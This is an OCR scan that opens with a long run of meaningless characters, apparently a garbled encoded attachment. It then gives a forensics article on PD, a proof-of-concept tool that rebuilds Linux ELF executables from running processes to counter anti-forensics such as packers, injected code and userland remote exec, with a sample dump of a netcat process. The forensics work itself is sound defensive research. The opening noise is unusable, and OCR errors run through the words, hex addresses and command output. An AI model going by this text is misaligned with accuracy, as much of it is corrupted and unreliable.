E | W 


*=0/V5_B4’ @M.8?) +4’ 


2 
K*>:B*A(6HFS_I 
DWSY6G&<Y42WWW79ZB 
GA7SG=/+.1'9) SCFXO 
* _D911H, IP+NGL3%) K 


ES 


KR?V!XT) ?LXYKSGUZKUT 
[642FD_.AM4,J/W@:F_4 


HC! *F34GU (2@SY-[5R?0 
55FB4D5R>?&>2X1ISX*&0C 


H/B86K3&;-**4+;d 


+; ©+D\P= 


N6X (\"#?2#G\: YPS (H%Q; 


'EKJ9B’ J65’PMC91\62_132ZH 
RV<B\S!’ $122?034#? (7QW8S!?/ 
E“D-ONO] 


ES40UI [2?0K:>1 
RG**JO () OUPSOABTCF694G31DD0I’ 4Z4HEM 
KBTF [7US@A<_HC’ W) 9#"*C56 [P2USKZ 
S?_OH_O-AIWUW_O,M’H[_*.*;Y_\H 
tBF=7FNCZ*:2:.W\:F9/C (MK\_TD;;Z 
M]$0?T/CS4WT ‘D"*42B, #2; -2?62H\DFI/C*S\4FI/C (0/B?51P [0923ZR$ 
<:W-]Y-‘*N2_R1 
E+LC7R>’,F4 


\&*B>RD ! AU 
#!U!_[;2BS 
'RT!9*BVBH* 


, 


[T, 9IV3*LO[ 
. VEC HEF?! 


+>U= 


R*STC# 
PUY 9U 


T 
Li 


T: [W6S6 
S51MFN2T&I 
8LZ:\HW. 
(P’CQO.M 


Ge 
Ei 


U 


1 


Ems 


R># 


13 


D! 


(EJ>M10. 5C==_7 (9+# 


A2S.@(<7V(Q_7>U! 34> 
N] 
E<W5SVM*ZFJ7 
C’ &Y (CS+H1 


; 6MVD; U.58°U, 9&E@ 
\. TKOZTBC&. 
E:1-‘*AI5]U\ 


$9$66@07=9&’ @_KGPI 


RM=%$C$75H_WG__O-_L8$;S_O+ 


E*Q 
IM* @6<WNA*; ] SIWP&K**F=W) -<L38=%J3N 


>B92W* @QA87\\S?14+%@<2x4 ) (J/& (W.G 


A 
e 


1426]! 


SM 


LM _ 


;+S1TY([.JT 


, 


ES2N *4SHL4X?1:%30<?"1 
D***3D) O#A[3F/*Q.2EV1 
“S$ [XOFZN22] 


——— 
= 


6=2<*49?E2B 
TIBI" | "HZ 
%SWOO’ INUGI 
QI*V_+E5C?, 
] \"CO5P?): 
5KHX!GNP=M, 
KO_SH*H] \7WH 
ZGG"-TZIK;, 
3>/KPEKY50) BY; QG&1 
U>E% 2? 3B6J6SX+H/%8) 
9DMJI8S—QN?D1*HMS] ) 
") D#VU: 4F<6*°96E6S] 4 
EB2;>L!‘5">Z.L9!-4 


K# 
"P\ (Z!VHI6 


H=4 


= 
ry 


x 


‘UT5R5?/ Z2HY (2%9 
&\W6V, C=&* &US03 [3] "9SSBY+=1*O", +CZMOGA>ZI1 
[8_; Y$_1C3\YC8 


#d1’ 
t1:L?G(7!0*3D44 


+-@O, E"O8"FCSB-4!Z*KDRAI, 3270 


31_,) 64@LS7*++"295C=/1T&%) OMI 


:WROY25G[VZ 
PD?’ 


(+CM’ HP] 


% 


Z6;LS*S 
C85?SF% 


8!YUY)@ 
RR4K7 


K *~M W 
5] SA[31!HC 


0494=] 


P7=X; [T5;) NT<3ON 


EM5) &A 
M7? JHOTIW"H7M5HI5BG) >DJ*O<WV<AtI."] 
MK6G+YF7YG[2/H9OBVZ2YKT_*_#YW_#_ SQ@W*#WWWK=UD/Y_:]V9[-S]_MOW**A 
M*7\%1C\ZV; 12’ ] ?7D_VAOMNG*; Z*°SN; ’ 9ZW8P_1 
MT-D_>/+RS=.]8W[3V, ?@(.?PZ.O0XK=8X [#A/]WYZ\SQ],W&>6.<8C]6]*C:1 


EC#]PXXI+5 


2L) , @M4M>4] 
EW/S&8]SVG2%753 
78GDGY; 


U* 


HSX+.RJI5A 
L[’ X7IFDN 
6"QX-PRSXMNB7>Q\6\V) XLN?>_QWY+\+#<=PO5I 
+@9GLI ‘OVLV 
>0J03&D@1I; G8"Td 
-N&1<7/3!=C0;H 
]$2N),/"1I-.%. 
D5G@YFB4) !2]) SMC 
LB85+XIN*A*O@FC 
9J*10)BS1 


V:\SMYB! 3*S] 


G 


OXSV_R2/SG%]S_2_;2 
4L67*1Q’ HU’ 9.F8MZL 


UN<+DLOKV-JX""Z5%L&RTT=5NM@BK 
‘-8X!V4*OUSA"AM>) 8>N#./3%) .OB&&8 
G56XWY#C:RUOY=1F\TF 
U"[:NW*‘/PP’ /F@XI@;"*8>S 
(4 
[T_M7$Q2-?*2G=P ["N@!K1TX*"T2 
E/@/;@@04=T, 3[ ( (*TSHLOMW?X; OTF 
_W@4B(‘P].H*MO!)’=*QP&5:TO[.WM\ 


EP247+R- 
]VTB*") 4C62?%SCSF:) 
[=W*BD&A 


I_F!VRUV=()/)11%*S- 


VMUSRAW=Y6S# [X$SN8S, O2AJ/]26L 
8>YVI! IB9YM?*/T=?°3d 
R&6FB"81%, OJ&I+BR>F8M117&&6%5;1)1 
E[S&@91YF; # 


EHU&=1NJI 
JAVSK5*% .J@IVI.%/ ** 
8BGS]S&) : !GOXC8R\O 
D6Q,_63EJU’F1"%S10L 
ES%8\8%0E3-) (U#/1! 
ExY-8C+A:@KKL/_Z 
TH(>[.-B60"V!*,JX9 


W3"5XM?=</ZGI@2?%.$$8%9,= 
LGT%F!@O( [WD7W-?1IL%Z/-\; ?L]5\=1 


IN\->JT[1I4<) <*&5*W[ 
L(EZF!AS\LO)>S$S’9G 
#FSSY (Y; DM4C@9-F*- 
531’ *<22W[=2:M"YG? 
E°O.4:5K)K%3@) 
*2Q* 
J+/GY 


pP*/\AJ\J2W[" 


’ 


EBO-S$T*0./3°Q!NFF2LDMS=*/JL[JRR 
U\NIM65P5T*DJ54 


1,\< 
4=7L6F=' GMIBWS (OS+ 
E\Z2@YY, *“FZOJWRAQ 
KL[2.PKEB13XF332? 


g, 
KZ+S ‘PRR64"R=<KS 
2R=38+B4/DCIU=IX#S 
LG 
D6B*Z] *0%+. OY#O ( 
6Z>;2X!"UT[S*.2& 
E?P2;DD.SY,<Q?F$ 
P; IA4) <*D*KK9 
DZ) J<*Y*0<B5: 


4A 
,W 


“1-3; "0G-WSZNE3D [SO 
Y8L_1E-B,, ‘*2D,!]X 
"5@Z=] 25x, 2@] 
<O8H@XL; 30RQ@3’H_ 
X/V31] ‘5SW108WKK1 
'TEC#H#) [S"3UCA"V7I 
0*=0.K4_D4V>.V°V? 


Li 


\ 


a 


le 


ry 


13 fag | 


EB; VOWEL ‘T<"*R"R4M 


7 XIN_; *"/ 2K; *2-1:T 


DX6ZVT; 5&R; 6V94QL_ 


E5BI 


XJ>;=5\LZFHG 


r<;Y_ 


EIT] N\M&<F 


\N_N/K/T*>*/,\51/A 


11.txt Wed Apr 26 09:43:44 2017 14 


MP5\-K*8X+TS$3E-] B@2UYOSZFM+>1*\5X),<Y]:;S; :>"X/*7-SP-UK<J) &TV\ 
M9’ LE\S+[3:TISO3%S0501V-LH&% * [B46F [%<>Q@6YKESE>UN2* ] ZI /GN#8F28U 
MU7AJI5"R%]+0734E14YGK] ZH1XL] RZO<, ; TAL-9D?2Z752[&Z, ‘&SSM*R* LKQ 
M 
M 
7 


FW2?10*,S DTSCC<ZW9YC_:O06FJ0_-U!—-) >T:N*E’ 7°HTIOQ (NBV-S1E./3>0 
MM3, —<94MG; WZ[5WS]US] ]P]=\_=<_?</7?/W7/WW#UWS] US] ]P]=\_=<_?< 
/72?/W7/WWHUWS [_#\W\!\B#2U‘#P%*** 


end 


12.txt Wed Apr 26 09:43:44 2017 1 
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Volume Ox0b, Issue O0x3f, Phile #0x0c of 0x14 


[ Advances in remote-exec AntiForensics ] 


[ by ilo ] 
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-—-[ 1.0 - Abstract 


PD is aproof of concept tool being released to help rebuilding 
or recovering a binary file from a running process, even if the file never 
existed in the disk. Computer Forensics, revers ngineering, intruders, 
administrators, software protection, all share the same piece of the puzzle 
in a computer. Even if the intentions are quite different, get or hide the 
real (clean) code, everything revolves around it: binary code files 
(executable) and running process. 


Manipulation of a running application using code injection, hiding 
using ciphers or binary packers are some of the current ways to hide the 
cod being executed from inspectors, as executed code is different than 
stored in disk. The last days anew anti forensics method published in 
phrack 62 (Volume 0x0b, Issue O0x3e, phile 0x08 by grugq) showed an 


"user landexec module". ulexec allows the execution of a binary sent by the 
network from another host without writing the file to disk, hiding any 
clue to forensics analysts. The main intention of this article is to 


show a process to success in the recovering or rebuilding a binary file 
from a running process, and PD is a sample implementation for that process. 
Tests includes injected code, burneyed file and the most exotic of 
all, rebuilding a file executed using grugq’s "userland remote exec" that 
was never saved in disk. 


--[ 2.0 - Introduction 


An executable contains the data the system needs to run the application 
contained in the file. Some of the data stored inthe file is just 
information the system should consider before launching, and requirements 
needed by the application binary code. Running an executable is a kernel 
process that grabs that information from the file, sets up the needings for 
that program and launches it. 


However, although a binary file contains the data needed to launch a 
process and the program itself, there’s no reason to trust that program has 
not been modified during execution. One common task to avoid host IDS 
detecting binary manipulation is to modify a running process instead of 
binary stored files. A process may be running some kind of troyan injected 
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code until system restart, when original program will be executed again. 


In selfmodifing, ciphered or compressed applications, program code in disk 
may differ from program code in memory due to ‘by design’ functionality of 
the file. It’s a common task to avoid revers ngineering and scope goes 
from virus to commercial software. Once the program is ran, it deciphers 
itself remaining clean in memory content of the process until the end of 
execution. However, any attempt to see the program contained in the file 

will require a great effort due to complexity of the implemented cipher or 
obfuscation mechanism. 


In other hand, there’s no reason to keep the binary file once the process 
is started (for example a troyan installer). Many forensics methods rely 
their investigation in disk MAC (modify, create, access) timeline analysis 
after powering down the system, and that’s the main reason when grugq 
talked about user land remot xec: there’s no need to write data in disk 
if you can forge the system to run a memory portion emulating a kernel 
loader. This kind of data contraception may drop any attempt to create an 
activity timeline due to the missing information: the files an intruder may 
install in the system. Without traces, any further investigation would 
not reveal attacker information. That’s the description of the "remot xeC 
attack", defeated later in this paper. 


All those scenarios presented are real, and in all of them memory system of 
the suspicious process should be analyzed, however there’s no mechanism 
allowing this operation. Ther ar several tools to dump the memory 
content, but, in a "human unreadable - system unreadable" raw 
format. Analysis tools may need an executable formatted file, and also 
human analyst may need a binary file being launched in ae testing 
environment (aka laboratory). Raw code, or dumped memory code is’ useful 
if execution environment is known, but sometimes untraceable. Here is 
where pd (as concept) may help inthe analysis process, rebuilding a 
working executable file from the process, allowing researchers to launch 
when and where they need, and capable of being analyzed at any time in any 
system. 


Rebuilding a binary file from a memory process allow us to recover a file 
modified in run time or deciphered, and also recover if it’s being executed 
but never was saved in the system (as the remot xecuted using ulexec), 
preventing from data contraception and information missing in further 
analysis. 


This paper will describ the process of rebuilding an executable from a 


process in memory, showing each involved data in very step. On of the 
main goals of the article is to realiz where the recovering process is 
vulnerable to manipulation. Knowing our limits is our best effort to 


develop a better process. 


Ther ar several posts in internet related to code injection and 
obfuscation. For userland remote execution trick refer to phrack 62 
(Volume Ox0b, Issue 0x3e, phile 0x08 by grugq) 


--[ 3.0 - Principles 


Until this year the most hiding method used for code (malicious or 
not) hiding was the packing/cyphering one. During execution time, the 
original code/file should be rebuilt in disk, in memory, or where 
the unpacker/uncypher should need. The disk file still remains ciphered 
hiding it’s content. 


To avoid disk data written and Host IDS detection, several ways are being 
used until now. Injecting binary code right in a running process is one of 
them. In a forensics analysis some checks to the original file signature 
(or MD5, or whatever) my fail, warning about binary content 
manipulation. If this code only resides in memory, the disk scan will never 
show its presence. 
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"Userland Remote Exec" is anew kind of attack, as a way to execute files 
downloaded from a remote host without write them to disk. The main idea 

goes through an implementation of a kernel loader, and a remote file 
transfer core. When "ul_remote_exec" program receives a binary file it sets 
up as much information and estructures as needed to fork or replace the 
existing code with the downloaded one, and give control to this new 
process. It safes new program memory pages, setting up execution 
environment, and loading code and data into the correct sections, the same 
way the system kernel does. The main difference is that system loads a file 
from disk, and UserLand Remote Exec (down)"loads" a file from the network, 
ensuring no data is written in the disk. 


With all these methods we have a running process with different binary data 
than saved in the disk (if existing there). Different scenarios that could 
b 
a 


e resolved with one technique: an interface allowing us to dump a process 
nd rebuild a binary file that when executed will recreate this same 
process. 


--[ 4.0 - Background 


Under Windows architectur there’re a lot of useful tools providing 
this functionality in user space. "procdump" is the name of a generic 
process dumper for this operating system, although there’re many more 
tools including application specific un-packers and dumpers. 


Under linux (*nix for x86 systems, the scope of this paper) several studies 


attempt to help analyzing the memory (ie: Zalewski’s memfetch) of a 
process. Kernel/system memory may give other useful information about any 
of the process being executed (Wietse’s memfetch). Also, gdb now includes 


dumping feature, allowing the dump of memory blocks to disk. 


There’s an interesting tool comparing a process and a binary file 
(www.hick.org’s elfcmp). Although I discovered later in the study, it 
didn’t work for me. Anyway, it’s an interesting topic in this article. 
Recover a binary from a core dump is an easy task due to the implementation 
of the core functionality. Silvio Cesare stated that in a complete paper 
(see references). 


There’s also a kernel module for recover a burneyed binary from memory once 
it’s deciphered, but in any case it cares about binary analysis. It just 
dumps a memory region where burney ngine writes dechypered data before 
executing. 


All these approximations will not finish the process of recovering a binary 
file, but they will give valuable information and ideas about how the 
process should/would/could be. 


The program included here is an example of defeating all these 
anti-forensics methods, attaching to apid, analyzing it’s memory and 
rebuilding a binary image allowing us to recover the process data and code, 
and also re-execute it in a testing environment. It summarizes all the 
above functionality in an attempt to create a rebuilding working 

interface. 


--[ 5.0 - Requirements 


In an initial approach I fall into a lot of presumptions due to 
the technology involved in the testing environment. Linux and x86 32bits 
intel architecture was the selected platform with kernel 2.4%. There was 
a lot of analysis performed in that platform assuming some of the kernel 
é 
t 


onstants and specifications removed or modified later. Also, GCC was 
he selected compiler for the binaries tested, so instead of a generic 
F format, the gcc elf implementation has been the referral most of the 
time. 


After some investigation it was realized that all these presumptions should 
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be removed from the code for compatibility in other test systems. Also, GCC 
was left apart in some cases, analyzing files programmed in asm. 


The /proc filesystem was first removed from analysis, returning bak after 
some further investigation. /proc filesystem is a useful resource for 
information gathering about a process from user space (indeed, it’s the 
user space kernel interface for process information queries). 


The concept of process dumping (sample code also) is very system dependant, 
as kernel and customs loaders may leave memory in different states, 
so there’s no a generic program ready-to-use that could rebuild any kind 
of executable with total guaranties of use. A program may evolve in run 
time loading some code from a inspected source, or delete th used code 
while being executed. 


Also, it’s very important to realize that even if a binary format is 
standardized, every file is built under compiler implementation, so the 
information included in it may help or difficult the restoring process. 


In this paper there are several user interfaces to access the memory of a 
process, but the cheapest one has been selected: ptrace. From now on, 
ptrace should be a requirement in the implementation of PD, as no other 
method to read process memory space has been included in the POC. 


In order to reproduce the tests, a linux kernel 2.4 without any security 
patch (like grsecurity, pax, or other ptrace and stack protection) is 
recommended, as well as gcc compiled binaries. Ptrace should be enabled and 
/proc filesystem would be useful. grugq remote exec and burneyed had been 
successfully compiled in this environment, so all the toolset for the test 
will be working. 


Files dynamically linked to system libraries become system dependant if the 
dynamic information is not restored to it’s original state. PD is 
programmed to restore the dynamic subsystem (plt) of any gcc compiled 
binary, so gcctldd dynamic linked files would be restored to work in other 
host correctly. 


--[ 6.0 - Design and Implementation 
Some common tasks had been identified to success in the dump of a 
process in a generic way. The design should heavily rely in system 


dependant interfaces for each one, so an exhaustive analysis should be 
performed in them: 


1- Get information of a process 

2- Get binary data of that process from memory 

3- Order/clean and safe binary data in a file 

4— Build an ELF header for the file to be correctly loaded 
5- Adjust binary information 


Also, there’s a previous step to resolve before doing any of the previous 


tasks, it’s, to get communication with that process. We need an interface 
to read all this information from the system memory space and process it. 
In this platform ther ar som of them available as shown’ below: 


— (per process) own process memory 
/proc file system 

—- raw access to /dev/kmem /dev/mem 
— ptrace (from user space) 


Raw memory access turns hard the process of information locating, as run 
time information may be paged or swapped, and some memory may be shared 
between processes, so for the POC it’s has been removed as an option. 


Per Process method, even if it may appear to be too exotic, should be 
considered as an option. The use of this method consists in exploitation of 
the execution of the process selected for dump, as for buffer overflow, 
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library modifications before loading and any other sophisticated way to 
execute our code into process context. Anyway for the scope of the 
analysis it’s been deprecated also. 


a 


/proc and PTRACE are the available options for the POC. Each one has it’s 
own limits based in implementation of the system. As a POC, PD will use 
/proc when available, and ptrace if there’s no more options. Consider the 
use of the other methods when ptrace is not available in the system. 


By default ptrace will not attach any process if it’s already being 
attached by another. Each process may be only attached by one parent. This 
limit is assumed as a requirement for PD to work. 


[ 6.1- Get information of a process 


To know all the information needed to rebuild an executable it’s 
important to know the way a process is being executed by the system. 


As a short description, the system will create an entry in the process 
list, copy all data needed for the process and for the system to success 
executing the binary and launches it. Not all the data in the file is 
needed during execution, some parts are only used by the loader to correct 
map the memory and perform environment setup. 


Getting information about a process involves all data finding that could 
be useful when rebuilding the executable file, or finding memory location 
of the process, it’s: 


—- Dynamic linker auxiliary vector array 

— ELF signatures in memory 

— Program Headers in memory 

—- task_struct and related information about the process 
(memory usage, memory permissions, ...) 

- In raw access and pre process: permission checks of memory maps (rwx) 

-— Execution subsystems (as runtime linking, ABI register, 
pre-execution conditions, ..) 


Apart from the loading information (not removed from memory by default), A 
process has three main memory sections: code, where binary resides; data, 
where internal program data is being written and read; and stack, asa 
temporal memory pool for process execution internal memory requests. Code 
and Data segments are read from the file in the loading part by the kernel, 
and stack is built by the loader to ensure correct execution. 


[ 6.2- Get binary data of that process from memory 


Once we have located that information, we need to get it from the 
memory. 


For this task we will us th interfac selected earlier: /proc or 
ptrace. The main information we should not forget is: 


—- Code and Data portions (maps) of the memory process. 

- If exists (has not been deleted) th lf and/or program headers. 
- Dynamic linking system (if it’s being) used by the program. 

- Also, "state" of the process: stack and registers* 


Stack and registers (state) are useful when you plan to launch the same 
process in another moment, or in another computer but recovering the 
execution point: Froze the program and re-run in other computer could be a 
real scenario for this example. One of the funniest results found using pd 
to froze processes was the possibility to save a game and restore the saved 
"State" as a way to add the "save game" feature to the XSoldier game. 


Something interesting is also another information the process is currently 
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handling: file descriptors, signals, and_ so. With the signals, file 
descriptors, memory, stack and registers we could "froze" a running 
application and restore it’s execution in other host, or in other 
moment. Due to the design of the process creation, it’s possible to 

recreate in great part the state of the process ven if it’s interacting 
with regular files. In amore technical detail, the re-create process 
will inherit all the attributes of the parent, including file descriptors. 
It’s our task if we would like to restore a "frozen state" dumped 
process to read the position of the descriptors and restore them for the 
"frozen process". 


Please notice that any other interaction using sockets or pipes for 
xample, requir an state analysis of the communicated messages so their 
value, or streamed content may be lost. If you dump a program in the 
middle of a TCP connection, TCP session will not be established again, 
neither th sent data and acknowledge messages received from the remote 
system, so it’s not possible to re-run a process from a "frozen state" in 
all cases. 


[ 6.3- Order/Clean and safe binary data in a file 


Order/Clean and safe task is the simplest one. Get all the 
available information and remove the useless, sort the useful, and save in 
a secure storage. It has been separated from the whole process due to 
limitations in the recovering conditions. If the reconstructed binary could 
be stored in the filesystem then simply keep the information saved in a 
file, but, it’s interesting in some cases to send the gathered information 
to another host for processing, not writing to disk, and not modifying the 
filesystem for other type of analysis. This will avoid data 
contraception in a compromised system if that’s the purpose of pd 
execution. 


----[ 6.4- Build an ELF header for that file to be loaded 


If finally we don’t find it in memory, the best way is to rebuild it. 
Using the ELF documentation would be easy enough to setup a basic header 
with the information gathered. It’s also necessary to create a program 
headers table if we could not find it in memory. 


Even if the ELF header is found in memory, a manipulation of the structure 
is needed as we could miss a lot of information not kept in memory, or not 

necessary for the rebuild process: For example, all the information about 
file sections, debug information or any kind of informational data. 


----[ 6.5- Adjust binary information 


At this point, all the information has been gathered, and the basic 
skeleton of the executable should be ready to use. But before finishing the 
reconstruction process some final steps could be performed. 


As some binary data is copied from memory and glued into a binary, some 
offset and header information (as number of memory maps and ELF related 
information) need to be adjusted. 


Also, if it’s using some system feature (let’s say, runtime linking) some 
of the gathered information may be referred to this host linking system, 
and need to be rebuilt in order to work in another environments. 


As the result of reconstruction we have two great caveats to resolve: 


- E1f header 
- Dynamic linking system 


The elf header is only used in the load time, so we need to setup a 
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compatible header to load correctly all the information we have got. 


The dynamic system relies in host library scheme, so we need to regenerate 
a new layout or restor the previous one to a generic usable dynamic 
system, it’s: GOT recovering. PD resolves this issue in an elegant and 
easy way explained later. 


—---[ 6.6 - Resume of process in steps 


Now let’s resume with more granularity the steps performed until now, 
and what could be do with all the gathered information. As a generic 
approach let’s resume a "process saving" procedure: 


Froze the process (avoid any malicious reaction of the program..). 
- Stop current execution and attach to it (or inject code.. or..). 
—- Save "state": registers, stack and all information from the system. 
Recover file descriptors state and all system data used by the process. 
-— Copy process "base": files needed (opened file descriptors, libraries, 


) 


-— Copy data from memory: copy code segments, data segments, stack, 
libraries.. 


With all this information we can now do two things: 


- Rebuild the single executable: reconstruct a binary file that could 
be launched in any host (with the same architecture, of course), or 
executable only in the same host, but allowing complete execution 
from the start of the code. 


— Prepare a package allowing to r xecute the process in another host, 
or in any other moment, that’s, a "frozen" application that will resume 
it’s state once launched. This will allow us to save a suspicious 

process and relaunch in other host preserving it’s state. 


If it’s our intention to recover the stat in other moment, even if its 
recovery is not totally guaranteed (internal system workflow may avoid 
its correct execution) the loading process will be: 


- Set all files used by the application in the correct location 
Open the files used by the program and move handlers to the same 
position (file handlers will be inherited by child process) 
Create a new process. 

—- Set "base" (code and data) in the correct segments of memory. 

—- set stack and registers. 

— launch execution. 


But for the purpose of this paper, the final stage is to rebuild a binary 
file, a single executable presumed to be reconstructed from the image of 

the process being executed in the memory. These are the final steps we 
could see later, labeled as pd implementation: 


-— Create an ELF header in a file: if it could not be found. 
- Attach "base" to the file (code and data memory copies) 
- Readjust GOT (dynamic linking). 


----[ 6.7 - pd (process dumper) Proof of concept. 


At the time of writing this paper, a simple process dumper is included 
for testing purposes. Although it contains basic working code, it’s 
recommended to download the latest version of the program from the 
http://www.reversing.org web site. Th version included here is a very 
basic stripped version developed two years ago. This PD is just a POC for 
testing the process described in this article supporting dynamically linked 
binaries. This is the description of the different tasks it will perform: 
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- Ptrace attach to a pid: to access memory (mainly read memory) process. 


- Information gathering: Everytime a program is executed, the system 
will create an special struct in the memory for the dynamic linker to 
success bind functions of that process. That struct, the "Auxiliar 
Vector" holds som 1f related information of the original file, as an 
offset to the program headers location in memory, number of program 
headers and so (there is some doc about this special struct in the 
included source package). 


With the program headers information recovered, a loop for memory maps 
being saved to a file is started. Program header holds the loaded 
program segments. We’ll care in the LOAD flag of the mapped memory 
segment in order to save it. Memory segments not marked as LOAD are not 
loaded from that file for execution. This version of PD does not use 
/proc filesystem at any time. 


If the program can’t find the information, some of the arguments from 
command line may help to finish the process. For example, with "-p addr" 
it’s possible to force the address of the program headers in memory. 

This value for gcctldd built binaries is 0x8048034. This argument may 
be used when the program outputs the message "Search failed" when trying 
to locate PAGESZ. If PAGESZ is not in the stack it indicates that the 
"auxiliar vector array" could not be located, so program headers offset 
would neither be found (often when the fil is not launched from the 


shell or is loaded by other program instead of the kernel). 


—- File dumping: If the information is located the data is dumped to a 
file, including th lf header if it’s found in memory (rarely it’s 
deleted by any application). This version of pd will NOT create any 
header for the file (it’s done in the lastest version). 


This dump should work for the local host, as dynamic information is not 
being rebuilt. There’s a simple method to recover this information with 
files built with gcctldd as shown below. 


— GOT rebuilding 


The runtime linker should had modified some of the GOT entries if the 
functions had been called during execution. The way pd rebuilds the GOT 
is based in GCC compiling method. Any binary file is very compiler 
dependant (not only system), and a fast analysis about how GCC+LDD build 
the GOT of the compiled binary, shows the way to reconstruct it called 
"Aggressive GOT reconstruction". Another compilers/linkers may need more 
in depth study. A txt is included in the source about Aggressive GOT 
reconstruction. 


The option -l tagged as "local execution only" in the command line will 
avoid GOT reconstruction. 


In this version of PD, PLT/GOT reconstruction is only functional with 


GCC compiled binaries. To make that reconstruction, the .plt section 
should be located (done by the program usually). If the location is not 
found by the PD, the argument -g addr in the command line may help. Even 
if it has been tested against several files, this so simple implementation 
may fail with files using hard dynamic linking in the system. 

Once again I remember this is a test code. For better results please 

download latest version of PD. 


Aggressive reconstruction of GOT -- 


GCC in the process of compiling a source code makes a table for the 
relocation entries to link with ldd. This table grows as source file is 
being analyzed. Each relocatable object is then pushed in a table for 
internal manipulation. Each table entry has a size of 0x10 bytes, each 
entry is located 0x10 bytes from the last, so there are 16 bytes between 
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each object. Take a look at this output of readelf. 


Relocation section ’.rel.plt’ at offset 0x308 contains 8 entries: 
Offset Info Type Sym.Value Sym. Name 


080496b8 00000107 R_386_JUMP_SLOT 08048380 getchar 

080496bc 00000207 R_386_JUMP_SLOT 08048390 __register_frame_info 
080496c0 00000307 R_386_JUMP_SLOT 080483a0 __deregister_frame_inf 
080496c4 00000407 R_386_JUMP_SLOT 080483b0 libc_start_main 

080496c8 00000507 R_386_JUMP_SLOT 080483c0 printf 

080496cc 00000607 R_386_JUMP_SLOT 080483d0 fclose 

080496d0 00000707 R_386_JUMP_SLOT 080483e0 strtoul 

080496d4 00000807 R_386_JUMP_SLOT 080483f£0 fopen 

As shown below, each of the entries from the table is just 0x10 bytes 
below than the next in memory . When one of this objects is linked in 
runtime, it’s value will show a library space memory address out of the 
original segment. Rebuilding this table is done locating at least an 
unresolved value from this list (it’s symbol value must be inside it’s 
program section memory space). Original address could then be obtained 


from It’s position. 


The next step is to perform a replace in all entries marked as 
R_386_JUMP_SLOT with the calculated address for each modified entry. 
Note: Other compilers may act very different, so the first step is to 
fingerprint the compiler before doing any un-relocation task. 


Some options are manipulable in command line to pd. See readme for more 
information. Also, some demos are included in the src package, and a 
simple todo with help to launch each them: simple process dump, packed 
dump (upx or burneye), injected code dump and grugq’s ulexec dump. 


Here is, for your information a simple dump of a netcat process connected 
to a host: 


ilo@reversing src]$ ps aux |grep localhost 

ilopez 5114 0.0 0.2 1568 564 pts/2 St 02:25 0:00 nc localhost 80 
ilo@reversing src]$ ./pd -vo nc.dumped 5114 

pd V1.0 POF <ilo@reversing.org> 

source distribution for testing purposes.. 

v] Attached. 

performing search.. 

only PAGESZ method implemented in this version 

vjdump: Oxbffff000 to Oxc0000000: Ox1000 bytes 


AT_PAGESZ located at: Oxbffffb24 

v]Now checking for boundaries... 

v]Hitting top at: Oxbffffb94 

v]Hitting bottom at: Oxbffffblc 

v]JAT_PHDR: 0x8048034 AT_PHNUM: 0x7 

vjdump: 0x8048034 to 0x8048114: Oxe0O bytes 

vjprogram header( 0-7 ) table info.. 

v]TYPE Offset VirtAddr PhysAddr FileSiz MemSiz FLG Align 
v]PHDR 0x00000034 0x08048034 0x08048034 O0x000e0 0x000e0 0x005 0x4 

vJ INTE 0x00000114 0x08048114 0x08048114 0x00013 0x00013 0x004 Oxl 
v]LOAD 0x00000000 0x08048000 0x08048000 0x03f10 O0x03f10 0x005 0x1000 
v]LOAD 0x00004000 0x0804c000 0x0804c000 0x005d8 0x005d8 0x006 0x1000 
v]DYNA 0x00004014 0x0804c014 0x0804c014 0x000c8 0x000c8 0x006 0x4 
v]NOTE 0x00000128 0x08048128 0x08048128 0x00020 0x00020 0x004 0x4 
gather process information and rebuild: 


-loadable program segments, elf header and minimal size.. 
[v]dump: 0x8048000 to Ox804bf10: Ox3f10 bytes 

[v]realloc to 0x3f10 bytes 

[v]dump: 0x804c000 to 0x804c5d8: Ox5d8 bytes 

[v]realloc to 0x45d8 bytes 
[v] 
[v] 


max file size 0x45d8 bytes 
dumped .text section 
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vj]dumped .data section 

vj]segment section based completed 
analyzing dynamic segment.. 

v] HASH 

v]STRTAB 

v]SYMTAB 

v]symtable located at: 0x80482d8 , offset: 0x2d8 
vj]st_name 0x208 st_value 0x0 st_size 0x167 
vj]st_info 0x12 st_other 0x0 st_shndx 0x0 
v]STRSZ 

v]SYMENT 


Agressive fixing Global Object Table.. 
vaddr: 0x804c0e0 daddr: 0x8048000 foffset: 0x40e0 
* plt unresolved!!! 
section headers rebuild 
this distribution does not rebuild section headers 
saving file: nc.dumped 
[v] saved: 0x45d8 bytes 
Finished. 
[v]Dettached. 


In this example the program netcat with pid 5114 is dumped to the file 
nce.dumped. The reconstructed binary is only part of the original file as 
show in these lists: 


[ilo@reversing src]$ ls -la nc.dumped 

-rwxr-xr-x 1 ilo ilo 17880 Jul 10 02:26 nc.dumped 
[ilo@reserving src]$ ls -la ‘whereis nc* 

ls: nc:: No such file or directory 

-rwxr-xr-x 1 root root 20632 Sep 21 2004 /usr/bin/nc 


This version of pd does all the tasks of rebuilding a binary file from a 
process. The pd concept was re-developed to a more useful tool performing 
two steps. The first should help recovering all the information froma 
process in a single package. With all this information a second stage allow 
to rebuild the executable in more relaxed environment, as other host or 
another moment. The option to save and restore state of a process has been 
added thus allowing to re-lauch an application in other host in the same 
state as it was when the information was gathered. Go to reversing.org web 
site to get the last version of the program. 


--[ 7.0 - Defeating PD, or defeating process dumping. 


The process presented in this article suffers from lots of 

presumptions: tested with gcc compiled binaries, under specified system 
models, its workflow simply depends on several system conditions and 

information that could be forged by the program. However following the 

method would be easy to defeat further antidump research. 


In each recovering process task, some of the information is presumed, and 
other is obtained but never evaluated before. Although the process may be 
reviewed for error and consistency checking a generic flow will not work 
against an specific developed program. For example, it’s very easy to 
remove all data information from memory to avoid pd reading all the 
needings in the rebuild process. Elf header could be deleted in runtime, or 
modified, as the auxiliar vector in the stack, or the program headers. 


There ar other methods to get the binary information: asking the kernel 
about a process or accessing in raw format to memory locating known 
structures and so, but not only it’s a very hard approach, the system may 
be forged by an intruder. Never forget that.. 


Current issues known in PD are: 
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-— If the program is being ptraced, this condition will prevent pd 
attaching process to work, so program ends here (for now). 


Solution: enable a kernel process to dump binary information even if 
ptrace is disabled. 


- If a forged ELF header is found in the system, probably it will be used 
instead of the real one. 


Solution: manually inspect ELF header or program headers found in the 
system before accepting them. 


- If no information about program headers or elf is found, and if /proc is 
not available in that user space, and aux_vt is not found the program will 
not work, and.. 


Solution: perform a better approach in pd.c. PD is just a POC code to 
show the process of rebuild a binary file. Ina real 


— Some kernel patches remove memory contents and modify binary file prior 
to execution: Unspected behavior. 


Anyway, PD will not work well with programs where the data segment has 
